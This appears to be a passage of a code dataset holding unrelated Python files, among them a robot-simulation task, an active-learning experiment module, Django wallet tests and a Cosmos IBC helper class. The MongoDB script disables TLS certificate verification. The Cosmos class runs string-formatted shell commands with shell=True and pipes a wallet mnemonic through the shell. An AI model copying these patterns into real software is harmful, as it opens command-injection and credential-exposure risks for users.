The blocks should be placed in a row, with each block touching the previous and next one.\"\n self.task_completed_desc = \"done building the wall.\"\n self.additional_reset()\n\n def reset(self, env):\n super().reset(env)\n\n # Add base.\n base_size = (0.15, 0.15, 0.01)\n base_urdf = 'box/box-template.urdf'\n base_pose = self.get_random_pose(env, base_size)\n env.add_object(base_urdf, base_pose, category='fixed')\n\n # Add blocks.\n block_size = (0.04, 0.04, 0.04)\n block_urdf = 'block/block.urdf'\n block_color = utils.COLORS['red']\n blocks = []\n for _ in range(3):\n block_pose = self.get_random_pose(env, block_size)\n block_id = env.add_object(block_urdf, block_pose, color=block_color)\n blocks.append(block_id)\n\n # Calculate target poses.\n target_poses = []\n for i in range(3):\n target_pose = ((0.5, 0.0, 0.005), (0, 0, 0, 1))\n target_poses.append(target_pose)\n\n # Add goals.\n for i in range(3):\n self.add_goal(objs=[blocks[i]], matches=np.ones((1, 1)), targ_poses=[target_poses[i]], replace=False,\n rotations=True, metric='pose', params=None, step_max_reward=1 / 3,\n language_goal=self.lang_template)","repo_name":"liruiw/GenSim","sub_path":"cliport/generated_tasks/code_stack_wall.py","file_name":"code_stack_wall.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"63"} +{"seq_id":"46855470827","text":"import pymongo\nimport ssl\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n# create a mongo client\nclient = pymongo.MongoClient( os.environ.get('MONGO_URI'),\n ssl_cert_reqs=ssl.CERT_NONE) # create an instance of MongoClient from the pymongo package \n # and store it in the `client` variable\n\n# retrive a database\ndb = client[\"sample_airbnb\"]\n\nlistings = db.listingsAndReviews.find({\n \"beds\": {\n \"$gte\": 3\n }, \n}, {\n \"name\": 1,\n \"beds\": 1\n}).limit(10)\n\nprint(listings)\nfor l in listings:\n print(l)","repo_name":"kunxin-chor/jes-mongo-flask","sub_path":"01-basic/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11069400150","text":"from itertools import permutations\ndef solution(k, dungeons):\n answer = 0\n poss = permutations(dungeons)\n for p in poss:\n tmp = 0\n health = k\n for i in p:\n if i[0]<= health:\n health -= i[1]\n tmp += 1\n if answer < tmp:\n answer = tmp\n return answer","repo_name":"lawkelvin33/swmaestro_ct","sub_path":"87946_bf.py","file_name":"87946_bf.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39686454047","text":"# =============================================================================\n# IMPORTS\n# =============================================================================\nimport torch\nimport abc\nimport dgl\nimport copy\nimport pinot\nfrom pinot.metrics import _independent\n\n# =============================================================================\n# HELPER FUNCTIONS\n# =============================================================================\ndef _slice_fn_tensor(x, idxs):\n \"\"\" Slice function for tensors.\n\n Parameters\n ----------\n x : `torch.Tensor`, `shape=(n_data, )`\n Input tensor.\n\n idxs : `List` of `int`\n Indices to be taken.\n\n Returns\n -------\n x : `torch.Tensor`, `shape=(n_data_chosen, )`\n Output tensor.\n \"\"\"\n return x[idxs]\n\n\ndef 
_slice_fn_tensor_pair(x, idxs):\n \"\"\" Slice function for tensors.\n\n Parameters\n ----------\n x : `torch.Tensor`, `shape=(n_data, )`\n Input tensor.\n\n idxs : `List` of `int`\n Indices to be taken.\n\n Returns\n -------\n x : `torch.Tensor`, `shape=(n_data_chosen, )`\n Output tensor.\n \"\"\"\n return x[0][idxs], x[1][idxs]\n\n\ndef _collate_fn_tensor(x):\n \"\"\" Collate function for tensors.\n\n Parameters\n ----------\n x : `List` of `torch.Tensor`\n Tensors to be stacked.\n\n Returns\n -------\n x : `torch.Tensor`\n Output tensor.\n \"\"\"\n return torch.stack(x)\n\n\ndef _collate_fn_graph(x):\n \"\"\" Collate function for graphs.\n\n Parameters\n ----------\n x : `List` of `dgl.DGLGraph`\n Input list of graphs to be batched.\n\n Returns\n -------\n x : `dgl.DGLGraph`\n \"\"\"\n return dgl.batch(x)\n\n\ndef _slice_fn_graph(x, idxs):\n \"\"\" Slice function for graphs.\n\n Parameters\n ----------\n x : `dgl.DGLGraph`\n Batched graph.\n\n idxs : `List` of `int`\n Indices of the chosen graphs.\n\n Returns\n -------\n x : `dgl.DGLGraph`\n Sliced graph.\n \"\"\"\n if x.batch_size > 1:\n x = dgl.unbatch(x)\n else:\n raise RuntimeError(\"Can only slice if there is more than one.\")\n\n return dgl.batch([x[idx] for idx in idxs])\n\n\ndef _slice_fn_tuple(x, idxs):\n \"\"\" Slice function for tuples.\n\n Parameters\n ----------\n x : `List` of `tuple`\n Input data pairs.\n\n idxs : `List` of `int`\n Indices of chosen data points.\n\n Returns\n -------\n `graph_slices` : `dgl.DGLGraph`\n Sliced and batched graph.\n\n `tensor_slices` : `torch.Tensor`\n Sliced and stacked tensor.\n \"\"\"\n gs, ys = x\n graph_slices = _slice_fn_graph(gs, idxs)\n tensor_slices = _slice_fn_tensor(ys, idxs)\n return graph_slices, tensor_slices\n\n\n# =============================================================================\n# MODULE CLASSES\n# =============================================================================\nclass ActiveLearningExperiment(torch.nn.Module, abc.ABC):\n \"\"\"Implements active learning experiment base class.\"\"\"\n\n def __init__(self):\n super(ActiveLearningExperiment, self).__init__()\n\n @abc.abstractmethod\n def train(self, *args, **kwargs):\n \"\"\" Train the model. \"\"\"\n raise NotImplementedError\n\n @abc.abstractmethod\n def acquire(self, *args, **kwargs):\n \"\"\" Acquire new data points from pool or space. 
\"\"\"\n raise NotImplementedError\n\n\nclass BayesOptExperiment(ActiveLearningExperiment):\n \"\"\"Implements active learning experiment with single task target.\n\n Parameters\n ----------\n net : `pinot.Net`\n Forward pass model that combines representation and output regression\n and generates predictive distribution.\n\n data : `List` of `tuple` of `(dgl.DGLGraph, torch.Tensor)`\n or `pinot.data.dataset.Dataset`\n Pairs of graph, measurement.\n\n acquisition : `callable`\n Acquisition function that takes the graphs of candidates and\n provides scores.\n\n optimizer : `torch.optim.Optimizer` or `pinot.Sampler`\n Optimizer for training.\n\n n_epochs : `int`\n Number of epochs.\n\n q : `int`\n Number of acquired candidates in each round.\n\n early_stopping : `bool`\n Whether the search ends when the best within the candidate pool\n is already acquired.\n\n workup : `callable` (default `_independent`)\n Post-processing predictive distribution.\n\n slice_fn : `callable` (default `_slice_fn_tensor`)\n Function used to slice data.\n\n collate_fn : `callable` (default `_collate_fn_tensor`)\n Function used to stack or batch input.\n\n\n Methods\n -------\n reset_net : Reset the states of `net`.\n\n blind_pick : Pick random candidates to start acquiring.\n\n train : Train the model for some epochs in one round.\n\n acquire : Acquire candidates from pool.\n\n run : Conduct rounds of acquisition and train.\n\n \"\"\"\n\n def __init__(\n self,\n net,\n data,\n acquisition,\n optimizer,\n num_epochs=100,\n q=1,\n num_samples=1000,\n early_stopping=True,\n workup=_independent,\n slice_fn=_slice_fn_tensor,\n collate_fn=_collate_fn_tensor,\n net_state_dict=None,\n train_class=pinot.app.experiment.Train,\n ):\n\n super(BayesOptExperiment, self).__init__()\n\n # model\n self.net = net\n self.optimizer = optimizer\n self.num_epochs = num_epochs\n\n # data\n self.data = data\n self.seen = []\n if isinstance(data, tuple):\n self.unseen = list(range(len(data[1])))\n self.g_all = data[0]\n else:\n self.unseen = list(range(len(data)))\n # If the data is DGLGraph\n if type(data[0][0]) == dgl.DGLGraph:\n self.g_all = dgl.batch([g for (g, y) in data])\n # If numerical data\n else:\n self.g_all = torch.tensor([g for (g,y) in data])\n\n # acquisition\n self.acquisition = acquisition\n self.q = q\n\n # early stopping\n self.early_stopping = early_stopping\n self.best_possible = torch.max(self.data[1])\n\n # bookkeeping\n self.workup = workup\n self.slice_fn = slice_fn\n self.collate_fn = collate_fn\n self.net_state_dict = net_state_dict\n self.train_class = train_class\n self.states = {}\n self.acquisitions = []\n\n def reset_net(self):\n \"\"\"Reset everything.\"\"\"\n # TODO:\n # reset optimizer too\n (p.reset_parameters() for _, p in self.net.named_children())\n\n if self.net_state_dict is not None:\n self.net.load_state_dict(self.net_state_dict)\n\n def blind_pick(self, seed=2666):\n \"\"\" Randomly pick index from the candidate pool.\n\n Parameters\n ----------\n seed : `int`\n (Default value = 2666)\n Random seed.\n\n Returns\n -------\n best : `int`\n The chosen candidate to start.\n\n Note\n ----\n Random seed set to `2666`, the title of the single greatest novel in\n human literary history by Roberto Bolano.\n This needs to be set to `None`\n if parallel experiments were to be performed.\n\n \"\"\"\n import random\n random.seed(seed)\n best = random.choice(self.unseen)\n self.seen.append(self.unseen.pop(best))\n return best\n\n def train(self):\n \"\"\"Train the model with new data.\"\"\"\n # reset\n 
self.reset_net()\n\n        # set to train status\n        self.net.train()\n\n        # train the model\n        self.net = self.train_class(\n            data=[self.seen_data],\n            optimizer=self.optimizer(self.net),\n            n_epochs=self.num_epochs,\n            net=self.net,\n            record_interval=999999,\n        ).train()\n\n\n    def acquire(self):\n        \"\"\"Acquire new training data.\"\"\"\n        # set net to eval\n        self.net.eval()\n\n        # split input target\n        gs, ys = self.unseen_data\n\n        # acquire no more points than are remaining\n        if self.q <= len(self.unseen):\n\n            # acquire pending points\n            pending_pts = self.acquisition(\n                self.net, gs, q=self.q, y_best=self.y_best\n            )\n\n            # pop from the back so you don't disrupt the order\n            pending_pts = pending_pts.sort(descending=True).values\n\n        else:\n\n            # set pending points to all remaining data, back to front\n            # (torch.range is deprecated and includes its endpoint; arange does not)\n            pending_pts = torch.arange(len(self.unseen) - 1, -1, step=-1)\n\n        self.seen.extend([self.unseen.pop(p) for p in pending_pts])\n\n\n    def update_data(self):\n        \"\"\"Update the internal data using old and new.\"\"\"\n        if len(self.unseen):\n            # grab new data\n            self.unseen_data = self.slice_fn(self.data, self.unseen)\n        else:\n            self.unseen_data = tuple()\n\n        # grab old data\n        self.seen_data = self.slice_fn(self.data, self.seen)\n\n        # set y_max\n        gs, ys = self.seen_data\n\n        self.y_best = torch.max(ys)\n\n\n    def run(self, num_rounds=999999, seed=None):\n        \"\"\"Run the model and conduct rounds of acquisition and training.\n\n        Parameters\n        ----------\n        num_rounds : `int`\n            (Default value = 999999)\n            Number of rounds.\n\n        seed : `int` or `None`\n            (Default value = None)\n            Random seed.\n\n        Returns\n        -------\n        self.acquisitions : `List` of `tuple`\n            Snapshots of (seen, unseen) indices after each round.\n\n        \"\"\"\n        idx = 0\n        self.blind_pick(seed=seed)\n        self.update_data()\n\n        while idx < num_rounds:\n\n            if self.early_stopping and self.y_best == self.best_possible:\n                break\n\n            self.train()\n            self.states[idx] = copy.deepcopy(self.net.state_dict())\n            self.acquisitions.append(\n                tuple([self.seen.copy(), self.unseen.copy()])\n            )\n\n            if not self.unseen:\n                break\n\n            self.acquire()\n            self.update_data()\n\n            idx += 1\n\n        return self.acquisitions\n\n\n
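# ---------------------------------------------------------------------------\n# Illustrative usage (a sketch; `my_net`, `my_data` and `my_acquisition` are\n# placeholders, not names defined in this module):\n#\n#     experiment = BayesOptExperiment(\n#         net=my_net,                      # a pinot.Net surrogate\n#         data=my_data,                    # list of (dgl.DGLGraph, torch.Tensor)\n#         acquisition=my_acquisition,      # e.g. an expected-improvement score\n#         optimizer=lambda net: torch.optim.Adam(net.parameters(), 1e-3),\n#         q=5,\n#         slice_fn=_slice_fn_tuple,\n#         collate_fn=_collate_fn_graph,\n#     )\n#     acquisitions = experiment.run(num_rounds=10, seed=2666)\n# ---------------------------------------------------------------------------\n\n\n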
class SemiSupervisedBayesOptExperiment(BayesOptExperiment):\n    \"\"\"Implements active learning experiment with single task target\n    with Semi Supervised model.\"\"\"\n\n    def __init__(self, unlabeled_data=None, *args, **kwargs):\n\n        super(SemiSupervisedBayesOptExperiment, self).__init__(*args, **kwargs)\n        self.unlabeled_data = unlabeled_data\n\n    def train(self):\n        \"\"\"Train the model with new data.\"\"\"\n        # combine new (unlabeled!) and old (labeled!)\n        # Flatten the labeled_data and remove labels to be ready\n        semi_supervised_data = pinot.data.utils.prepare_semi_supervised_data(\n            self.flatten_data(self.unseen_data),\n            self.flatten_data(self.seen_data),\n        )\n\n        # Combine this also with the background unlabeled data (if any)\n        if self.unlabeled_data:\n            semi_supervised_data = pinot.data.utils.prepare_semi_supervised_data(\n                self.unlabeled_data, semi_supervised_data\n            )\n\n        batched_semi_supervised_data = pinot.data.utils.batch(\n            semi_supervised_data, batch_size=len(semi_supervised_data)\n        )\n\n        # reset\n        self.reset_net()\n\n        # Compute the unsupervised scaling constant and reset it as the number\n        # of labeled data points changes after every round; count indices\n        # rather than taking len() of the (graph, tensor) pair, which is always 2\n        if self.unlabeled_data:\n            unsup_scale = float(len(self.seen)) / (len(self.unseen) + len(self.unlabeled_data))\n        else:\n            unsup_scale = float(len(self.seen)) / len(self.unseen)\n\n        # Update the unsupervised scale constant of SemiSupervisedNet\n        self.net.unsup_scale = unsup_scale\n\n        # set to train status\n        self.net.train()\n\n        # train the model (optimizer is a factory, as in the parent class;\n        # the attribute set in __init__ is num_epochs)\n        self.net = pinot.app.experiment.Train(\n            data=batched_semi_supervised_data,\n            optimizer=self.optimizer(self.net),\n            n_epochs=self.num_epochs,\n            net=self.net,\n            record_interval=999999,\n        ).train()\n\n    def flatten_data(self, data):\n        \"\"\"Unbatch a (graph, tensor) pair into a list of (graph, measurement) tuples.\n\n        Parameters\n        ----------\n        data : `tuple` of `(dgl.DGLGraph, torch.Tensor)`\n            Batched graph and stacked measurements.\n\n        Returns\n        -------\n        flattened_data : `List` of `tuple`\n            One (graph, measurement) pair per data point.\n        \"\"\"\n        gs, ys = data\n        # if gs.batch_size > 1:\n        gs = dgl.unbatch(gs)\n        ys = list(torch.unbind(ys))\n\n        flattened_data = list(zip(gs, ys))\n        return flattened_data","repo_name":"choderalab/pinot","sub_path":"pinot/active/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":12439,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"63"}
{"seq_id":"9922752525","text":"from far3.far3cffi import ffi, ffic\nfrom far3 import pluginmanager\nfrom far3 import fardialogbuilder as dlgb\n\nimport os\ncwd = os.getcwd().encode('ascii')\nfcwd = ffi.new(\"char []\", cwd)\n\npluginmanager.PySetup(fcwd)\n\ndef s2f(s):\n    return ffi.new(\"wchar_t []\", s)\n\ndef f2s(s):\n    return ffi.string(ffi.cast(\"wchar_t *\", s))\n\nclass Info:\n    def Message(self, guid1, guid2, Flags, HelpTopic, Items, ItemsNumber, ButtonsNumber):\n        print('Message', guid1, guid2, Flags, HelpTopic, Items, ItemsNumber, ButtonsNumber\n        )\n        return 0\n\n    def SendDlgMessage(self, hdlg, cmd, p1, p2):\n        print('SendDlgMessage', hdlg, cmd, p1, p2)\n        s = s2f('result abc')\n        return s\n\n    def DialogInit(self, guid1, guid2, x1, y1, x2, y2, HelpTopic, Item, ItemsNumber, Reserved, Flags, DlgProc, Param):\n        print('DialogInit', guid1, guid2, x1, y1, x2, y2, HelpTopic, Item, ItemsNumber, Reserved, Flags, DlgProc, Param\n        )\n        return 12345678\n\n    def DialogRun(self, hDlg):\n        print('DialogRun', hDlg)\n        return 0\n\n    def DefDlgProc(self, hDlg, Msg, Param1, Param2):\n        # stub default dialog procedure so DialogProc below has something to call\n        print('DefDlgProc', hDlg, Msg, Param1, Param2)\n        return 0\n\n    def DialogFree(self, hDlg):\n        print('DialogFree', hDlg)\n\ndef main():\n    info = Info()\n    from far3 import upythonconfig\n    cls = upythonconfig.Plugin(info)\n    #cls.OpenW(None)\n\n    @ffi.callback(\"FARWINDOWPROC\")\n    def DialogProc(hDlg, Msg, Param1, Param2):\n        # `self` does not exist here; use the `info` stub from the enclosing scope\n        return info.DefDlgProc(hDlg, Msg, Param1, Param2)\n\n    # { DI_DOUBLEBOX, L-2,1, E+2,2+H, 0, nullptr,nullptr, 0, title.c_str() },\n    b = dlgb.DialogBuilder(\n        cls,\n        DialogProc,\n        \"Python path\",\n        \"pythonpath\",\n        0,\n        dlgb.VSizer(\n            dlgb.HSizer(\n                dlgb.TEXT(text=\"Python path:\"),\n                dlgb.EDIT(\"path\", width=60, maxlength=120)\n            ),\n            dlgb.HSizer(\n                dlgb.BUTTON('vok', text=\"OK\", flags=ffic.DIF_DEFAULTBUTTON|ffic.DIF_CENTERGROUP),\n                dlgb.BUTTON('vcancel', 
text=\"Cancel\", flags=ffic.DIF_CENTERGROUP),\n ),\n ),\n )\n\n dlg = b.build(-1, -1)\n dlg.SetText(dlg.ID_path, 'abc')\n res = dlg.Info.DialogRun(dlg.hDlg)\n path = dlg.GetText(dlg.ID_path)\n print('DialogRun={}, path={}'.format(res, path))\n dlg.close()\nmain()\n","repo_name":"m32/far3python","sub_path":"t-dialog.py","file_name":"t-dialog.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"20056485624","text":"import requests\n\nisbn_repo = open(\"ISBN.txt\")\nisbn_numbers = isbn_repo.readlines()\nnew_archive = open(\"ISBN_TITLE.txt\", \"a\")\n\nfor isbn in isbn_numbers:\n request = requests.get(f\"https://openlibrary.org/isbn/{isbn.strip()}.json\")\n isbn_data = request.json()\n\n new_archive.write(f\"ISBN nº {isbn} {isbn_data['title']}\\n\")\n","repo_name":"vmpires/Python_API","sub_path":"17) ISBN API 2.py","file_name":"17) ISBN API 2.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"69918758921","text":"# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\n\nfrom datetime import time,datetime\nfrom estacionamientos.controller import consumir_saldo\nfrom estacionamientos.models import (\n Usuario,\n Billetera\n )\n\n###################################################################\n# ESTACIONAMIENTO VISTA DISPONIBLE #\n###################################################################\n\nclass consumirSaldoTestCase(TestCase):\n\n\tdef crear_usuario(self):\n\t\tusuario = Usuario(\n\t\t\tnombre = \"nom\",\n\t\t\tapellido = \"apell\",\n\t\t\tcedula = \"2345678\",\n\t\t\t)\n\t\tusuario.save()\n\t\treturn usuario\n\n\tdef crear_billetera(self):\n\t\tbilletera = Billetera(\n\t\t\tusuario = self.crear_usuario(),\n\t\t\tsaldo = 1000.00,\n\t\t\tpin = '1234ab'\n\t\t)\n\t\tbilletera.save()\n\t\treturn billetera\n\n\t# TDD\n\tdef test_consumirSaldo_MontoConsumoSinDecimales(self):\n\t\tb = self.crear_billetera()\n\t\tconsumo = consumir_saldo(b.id, '1234ab', 15)\n\t\tb_aux = Billetera.objects.get(id = b.id)\n\t\tsaldo = b_aux.saldo\n\t\tself.assertTrue(consumo)\n\t\tself.assertEqual(saldo, b.saldo-15)\n\n\t# Borde\n\tdef test_consumirSaldo_MontoConsumoIgualASaldo(self):\n\t\tb = self.crear_billetera()\n\t\tconsumo = consumir_saldo(b.id, '1234ab', 1000)\n\t\tb_aux = Billetera.objects.get(id = b.id)\n\t\tsaldo = b_aux.saldo\n\t\tself.assertTrue(consumo)\n\n\t# TDD\n\tdef test_consumirSaldo_MontoConsumoUnDecimal(self):\n\t\tb = self.crear_billetera()\n\t\tconsumo = consumir_saldo(b.id, '1234ab', 15.30)\n\t\tb_aux = Billetera.objects.get(id = b.id)\n\t\tsaldo = b_aux.saldo\n\t\tself.assertTrue(consumo)\n\n\t# TDD\n\tdef test_consumirSaldo_MontoConsumoDosDecimales(self):\n\t\tb = self.crear_billetera()\n\t\tconsumo = consumir_saldo(b.id, '1234ab', 65.18)\n\t\tb_aux = Billetera.objects.get(id = b.id)\n\t\tsaldo = b_aux.saldo\n\t\tself.assertTrue(consumo)\n\n\t# Malicia\n\tdef test_consumirSaldo_MontoConsumoTresDecimales(self):\n\t\tb = self.crear_billetera()\n\t\tconsumo = consumir_saldo(b.id, '1234ab', 9.876)\n\t\tb_aux = Billetera.objects.get(id = b.id)\n\t\tsaldo = b_aux.saldo\n\t\tself.assertTrue(consumo)\n\n\t# Malicia\n\tdef test_consumirSaldo_MontoConsumoMayorASaldo(self):\n\t\tb = self.crear_billetera()\n\t\tconsumo = consumir_saldo(b.id, '1234ab', 1000.01)\n\t\tb_aux = Billetera.objects.get(id = b.id)\n\t\tsaldo = b_aux.saldo\n\t\tself.assertEqual(saldo, float(consumo))\n\n\t# 
Adversarial case\n\tdef test_consumirSaldo_billeteraInexistente(self):\n\t\tconsumo = consumir_saldo(0, '1234ab', 15.00)\n\t\tself.assertFalse(consumo)\n\n\t# Adversarial case\n\tdef test_consumirSaldo_PinIncorrecto(self):\n\t\tconsumo = consumir_saldo(0, '2241', 15.00)\n\t\tself.assertFalse(consumo)","repo_name":"fabiocasmar/ingenieria-de-software-1","sub_path":"tests/test_consumir_saldo.py","file_name":"test_consumir_saldo.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"}
{"seq_id":"8811529820","text":"import sys\nimport subprocess\n\n\"\"\"\nThis will install the required python libraries if they are not already installed.\n\"\"\"\n\n\ndef install_package(package_name, import_name=None):\n    # pip package names may use dashes while the import name uses underscores;\n    # the original try/finally tuple expressions never actually imported anything\n    import_name = import_name or package_name.replace(\"-\", \"_\")\n    try:\n        __import__(import_name)\n    except ImportError:\n        subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", package_name])\n        __import__(import_name)\n\n\ninstall_package(\"requests\")\ninstall_package(\"datadog-api-client\")\n\n\"\"\"\nimport the rest of our libraries needed for the sdk.\n\"\"\"\nimport logging\nimport json\nimport requests\nfrom datadog_api_client.v2 import ApiClient, ApiException, Configuration\nfrom datadog_api_client.v2.api import logs_api\nfrom datadog_api_client.v2.models import *\n\n\nclass CosmosIBC:\n    def __init__(self, binary_name, rpc_node, api_node):\n        self.binary_name = binary_name\n        self.rpc_node = rpc_node\n        self.api_node = api_node\n        # base URL for the Cosmostation API; set this before calling\n        # cosmosation_api_request\n        self.cosmosation_api = \"\"\n        self.go_bin_folder = \"~/go/bin\"\n        self.destination_channel = \"\"\n        self.source_channel = \"\"\n        formatter_normal = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n        streamHandler = logging.StreamHandler(sys.stdout)\n        streamHandler.setFormatter(formatter_normal)\n        self.logger = logging.getLogger('logger')\n        self.logger.addHandler(streamHandler)\n        self.logger.setLevel(logging.INFO)\n\n    \"\"\"\n    Description:\n    This method will execute a cli command and set the go path.\n    arg1: command\n    arg2: go path\n    \"\"\"\n\n    def cli_command(self, command, gopath):\n        command_prefix = \"export PATH={go_path}:$PATH &&\".format(go_path=gopath)\n        command = command_prefix + command\n        result = subprocess.run(command, stdout=subprocess.PIPE, shell=True)\n        result = result.stdout.decode('utf-8')\n        return result\n
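\n    # Illustrative call, assuming an instance like ibc = CosmosIBC(\"gaiad\", rpc, api)\n    # (the binary and endpoints here are hypothetical):\n    #     version_output = ibc.cli_command(\"gaiad version\", ibc.go_bin_folder)\n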
\n    \"\"\"\n    Description:\n    This method will execute an api request against the api set as self.api_node. This will return a json/python\n    object of the data returned by the api.\n    arg1: api /node_info path you want to use.\n    \"\"\"\n\n    def api_request(self, api_path):\n        connection_url = \"{api_url}{api_path}\".format(api_url=self.api_node, api_path=api_path)\n        try:\n            request = requests.get(connection_url)\n        except Exception as e:\n            self.log_it(str(e))\n            return None\n\n        if request.status_code == 200 or request.status_code == 201:\n            request_data_object = request.json()\n            return request_data_object\n        else:\n            self.log_it(request.status_code)\n            self.log_it(request.content)\n            return None\n\n    \"\"\"\n    Description:\n    This method will execute a Cosmostation api request (base URL in self.cosmosation_api) to get transaction details.\n    This will return a json/python object of the data returned by the api.\n    arg1: api path you want to use.\n    \"\"\"\n\n    def cosmosation_api_request(self, api_path):\n        connection_url = \"{api_url}{api_path}\".format(api_url=self.cosmosation_api, api_path=api_path)\n        try:\n            request = requests.get(connection_url)\n        except Exception as e:\n            self.log_it(str(e))\n            return None\n\n        if request.status_code == 200 or request.status_code == 201:\n            request_data_object = request.json()\n            return request_data_object\n        else:\n            self.log_it(request.status_code)\n            self.log_it(request.content)\n            return None\n\n    \"\"\"\n    Description:\n    This method will send a message to a slack webhook channel.\n    arg1: message: the message you want to send to the channel.\n    arg2: the webhook channel you want to send message to.\n    \"\"\"\n\n    def send_slack_message(self, message, ibc_alert_channel_webhook):\n        slack_post_requests = requests.post(ibc_alert_channel_webhook, headers={\"Content-type\": \"application/json\"},\n                                            json=message)\n        return slack_post_requests.status_code, slack_post_requests.text\n\n    \"\"\"\n    Description:\n    This method will use the class logger object to log the message passed.\n    arg1: message: the message you want to log using the logger.\n    \"\"\"\n\n    def log_it(self, message):\n        self.logger.info(str(message))\n\n    \"\"\"\n    Description:\n    This method uses the api to check the account balance for a passed account.\n    arg1: account: the account you want to check the balance of.\n    \"\"\"\n\n    def check_account_balance(self, account):\n        try:\n            account_balance = 0\n            check_api_status_request = requests.get(self.api_node + \"/node_info\").json()\n            if check_api_status_request:\n                if account:\n                    query_balance = requests.get(self.api_node + \"/cosmos/bank/v1beta1/balances/\" + account)\n                    if query_balance.status_code == 200 or query_balance.status_code == 201:\n                        query_balance_json = query_balance.json()\n                        if \"balances\" in query_balance_json:\n                            if query_balance_json[\"balances\"]:\n                                account_balance = query_balance_json[\"balances\"][0][\"amount\"]\n        except Exception as e:\n            # log_it takes a single message string\n            self.log_it(self.binary_name + \" api not active: \" + str(e))\n        return account_balance\n\n    \"\"\"\n    Description:\n    This method checks to see if the api is responding on the api set at self.api_node on init of the class or override.\n    \"\"\"\n\n    def check_api_active(self):\n        try:\n            api_active = False\n            check_api_status_request = requests.get(self.api_node + \"/node_info\")\n            if check_api_status_request.status_code == 200:\n                api_active = True\n        except Exception as e:\n            self.log_it(self.binary_name + \" api not active: \" + str(e))\n        return api_active\n\n    \"\"\"\n    Description:\n    This method checks to see if the rpc is responding and in sync with the rpc set at self.rpc_node on init of the class or override. 
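\n\n    Example (illustrative):\n        rpc_active, up_to_date = ibc.check_rpc_node_in_sync()\n        if rpc_active and up_to_date:\n            height = ibc.get_current_block_height()\n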
\n \"\"\"\n\n def check_rpc_node_in_sync(self):\n try:\n rpc_active = False\n up_to_date = False\n check_status_request = requests.get(self.rpc_node + \"/status\")\n check_status_response = json.loads(check_status_request.text)\n if check_status_request.status_code == 200:\n rpc_active = True\n if not check_status_response[\"result\"][\"sync_info\"][\"catching_up\"]:\n up_to_date = True\n except Exception as e:\n self.log_it(self.binary_name + \"rpc not active\" + str(e))\n return rpc_active, up_to_date\n\n \"\"\"\n Description:\n This method loads an account from mnemonic locally using the CLI. It takes a moniker and mnemonic. It will delete and reload the account if one exists.\n arg1. moniker of the account you want to load, if you have loaded already use same moniker as you have already used.\n arg2. mnemonic of the account you want to load. \n \"\"\"\n\n def load_account_from_mnemonic(self, moniker, mnemonic):\n self.cli_command(\n \"\"\"{binary_name} keys delete {moniker} --keyring-backend test -y || echo \"not present\" \"\"\".format(\n binary_name=self.binary_name, rpc_node=self.rpc_node, moniker=moniker, mnemonic=mnemonic),\n self.go_bin_folder)\n load_mnemonic = self.cli_command(\n \"\"\"echo \"{mnemonic}\" | {binary_name} keys add {moniker} --keyring-backend test --recover\"\"\".format(\n binary_name=self.binary_name, rpc_node=self.rpc_node, moniker=moniker, mnemonic=mnemonic),\n self.go_bin_folder)\n address = load_mnemonic.split(\"address:\")[1].split(\"\\n\")[0].strip()\n return address\n\n \"\"\"\n Description:\n This command takes two loaded mnemonics a bank mnemonic and a destination mnemonic \n and will utilize the go cli to execute the transaction to fund the account.\n arg1. Account address of the bank\n arg2. Account address you want to fund\n arg3. Chain id of the chain you are funding on\n arg4. the ammount you want to fund.\n arg5. 
The gas price you want to pay for the tx.\n    \"\"\"\n\n    def send_from_bank(self, from_account, to_account, chain_id, ammount, gas_price):\n        send_money_transaction = self.cli_command(\n            \"\"\"{binary_name} tx bank send {from_account} {to_account} {ammount} -y --node {rpc_node} --gas-prices {gas_price} --keyring-backend test --chain-id {chain_id}\"\"\".format(\n                binary_name=self.binary_name,\n                rpc_node=self.rpc_node,\n                from_account=from_account,\n                to_account=to_account,\n                ammount=ammount,\n                gas_price=gas_price,\n                chain_id=chain_id), self.go_bin_folder)\n        return send_money_transaction\n\n    \"\"\"\n    Description:\n    This method will get the IBC connections of the rpc node specified using the binary specified during init.\n    \"\"\"\n\n    def retrieve_ibc_connections(self):\n        page = 1\n        connections = []\n        while True:\n            # pass the page flag (as get_packet_commitments_with_cli does);\n            # without it the loop would re-query page 1 forever\n            client_query = json.loads(self.cli_command(\n                \"{binary_name} query ibc connection connections --node {rpc_node} --output json --page {page}\".format(\n                    binary_name=self.binary_name,\n                    rpc_node=self.rpc_node,\n                    page=page),\n                self.go_bin_folder))\n            connections.extend(client_query['connections'])\n            if not client_query['pagination']['next_key']:\n                break\n            page += 1\n        return connections\n\n    \"\"\"\n    Description:\n    This method will get the IBC channels of the rpc node specified using the binary specified during init.\n    \"\"\"\n\n    def retrieve_ibc_channels(self):\n        page = 1\n        channels = []\n        while True:\n            client_query = json.loads(self.cli_command(\n                \"{binary_name} query ibc channel channels --node {rpc_node} --output json --page {page}\".format(\n                    binary_name=self.binary_name,\n                    rpc_node=self.rpc_node,\n                    page=page),\n                self.go_bin_folder))\n            channels.extend(client_query['channels'])\n            if not client_query['pagination']['next_key']:\n                break\n            page += 1\n        return channels\n\n    \"\"\"\n    Description:\n    This method will get the IBC Client States of the rpc node specified using the binary specified during init.\n    \"\"\"\n\n    def retrieve_ibc_client_states(self):\n        page = 1\n        clients = []\n        while True:\n            client_query = json.loads(self.cli_command(\n                \"{binary_name} query ibc client states --node {rpc_node} --output json --page {page}\".format(\n                    binary_name=self.binary_name,\n                    